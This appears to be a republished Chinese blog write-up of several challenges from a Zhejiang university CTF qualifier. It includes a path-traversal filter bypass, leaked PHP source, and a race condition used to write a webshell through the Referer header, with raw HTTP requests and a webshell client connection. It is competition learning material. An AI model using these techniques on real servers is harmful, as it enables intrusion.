返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >第五届浙江省大学生网络与信息安全竞赛预赛 部分WP
  • 276
分享到

第五届浙江省大学生网络与信息安全竞赛预赛 部分WP

php服务器开发语言网络安全web安全 2023-09-01 19:09:43 276人浏览 八月长安
摘要

文章目录 Dijkstra第五届浙江省大学生网络与信息安全竞赛-技能挑战赛Webnisc_easywebnisc_学校门户网站吃豆人吃豆魂买买买01 REManyCheck M

文章目录

Dijkstra

第五届浙江省大学生网络与信息安全竞赛-技能挑战赛

WEB

nisc_easyweb

  1. 打开是PHPinfo(),没有flag,访问Http://1.14.97.218:23306/robots.txt,得到/api/record,访问,得到test_api.php,访问

  2. 查看源代码得到提示i=FlagInHere
    请添加图片描述

  3. 添加参数?i=FlagInHere,得到DASCTF{65452772580975224074792032861586}
    请添加图片描述

nisc_学校门户网站

首页进入学生系统http://1.14.97.218:22898/home/login/,注册后登录,即可得到DASCTF{34707721847849260569451324788283}
请添加图片描述

吃豆人吃豆魂

  1. 查看源代码在index.js中得到Base64

请添加图片描述
2. Base64解码得到DASCTF{f235b02382a223fda4ce2ec62148d94c}

买买买01

  1. 猜测img参数可以实现任意文件读取,发现过滤了…/
    请添加图片描述

  2. fuzz一下使用…//可以绕过,Base64解码即可得到源码
    请添加图片描述

      $rootpath = '/var/www/html/';  $path = md5("compete" . $_SERVER['HTTP_REFERER']);  $sandbox = $rootpath . $path;  @mkdir($sandbox);  @chdir($sandbox);  function cop($filename)  {    copy($filename, $filename . "2.php");    rename($filename . "2.php", $filename);    echo "copy" . $filename . "success";  }  function read($filename)  {    $content = base64_encode(file_get_contents($filename));    echo '. $content . '"/>';  }  if(isset($_GET['action']) && $_GET['action'] === "copy")  {    $filename = $sandbox . "/" . $path . ".txt";    file_put_contents($filename, "compete" . $_SERVER['HTTP_REFERER']);    cop($filename);  }  else if(isset($_GET['action']) && $_GET['action'] === "read")  {    if(!isset($_GET['img']))    {      $filename = "maimaimai.jpg";    }    else {      $filename = str_replace("../", "", $_GET['img']);    }    $filename = $rootpath . "img/" . $filename;    read($filename);  }  else  {    header("Location: /index.php?action=read&img=maimaimai.jpg");  }?>
  3. 审计源码,发现action还可用copy,$_SERVER[‘HTTP_REFERER’]可控(即请求头中的Referer),生成的文件名后会加上2.php,但又会被重命名删去2.php,可以采用条件竞争的方式写马。

     fputs(fopen('shell.php','w'),'');?>

    Bp抓包

    GET /index.php?action=copy HTTP/1.1Host: 1.14.97.218:21715Referer: ');?>

    得到文件路径/var/www/html/3D3b75b32781ac19253077e70299fec7/3d3b75b32781ac19253077e70299fec7.txt

    使用Intruder模块,边上传写马文件,边访问

    GET /3d3b75b32781ac19253077e70299fec7/3d3b75b32781ac19253077e70299fec7.txt2.php HTTP/1.1Host: 1.14.97.218:21715

请添加图片描述
4. 稍等片刻,成功后即可访问写上去的马,使用蚁剑连接,得到flag
请添加图片描述

RE

ManyCheck

  1. 使用IDA打开分析,第一关结果为77
    请添加图片描述
  2. 第二关计算得到结果为55、49
    请添加图片描述
  3. 第三关编程计算得到1198089844
    请添加图片描述
    #include using namespace std;int calc(){return (1718896489 << (32 - 16)) | (1718896489 >> 16);}int main(){cout << calc();return 0;}
  4. 直接运行程序最后的结果会一闪而过,在cmd中运行即可得到DASCTF{M71_Gift_08L}
    在这里插入图片描述

MISC

好怪哦

  1. 解压得到fuck.zip发现无法正常打开,使用16进制编辑器打开发现文件被倒转

请添加图片描述

  1. 编写脚本进行倒序,得到正常的zip
f=open('fuck.zip','rb').read()m=open('flag.zip','wb')m.write(f[::-1])m.close()
  1. 解压得到flag.png,无法正常打开,发现缺少PNG文件头,补齐89 50 4E 47后可以打开,但缺少一半

  2. 修改大小后即可看到完整的flag
    请添加图片描述
    请添加图片描述

来源地址:https://blog.csdn.net/weixin_46356548/article/details/126912008

--结束END--

本文标题: 第五届浙江省大学生网络与信息安全竞赛预赛 部分WP

本文链接: https://lsjlt.com/news/389387.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作